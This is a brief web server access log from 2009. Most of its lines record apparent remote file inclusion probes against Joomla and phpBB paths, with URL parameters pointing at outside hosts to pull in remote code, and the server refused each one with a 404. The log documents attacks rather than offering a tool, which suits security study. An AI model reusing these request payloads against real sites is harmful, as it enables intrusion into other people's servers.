218.249.36.194 - - [15/Jun/2009:03:45:25 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://aboutav.com//id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
66.249.71.54 - - [15/Jun/2009:03:45:57 -0400] "GET /images/index2_minblds.jpg HTTP/1.1" 200 4362 "-" "Googlebot-Image/1.0"
218.246.20.221 - - [15/Jun/2009:03:46:37 -0400] "GET /logs/error_log.Q109053100///index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [15/Jun/2009:03:46:44 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://aboutav.com//id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
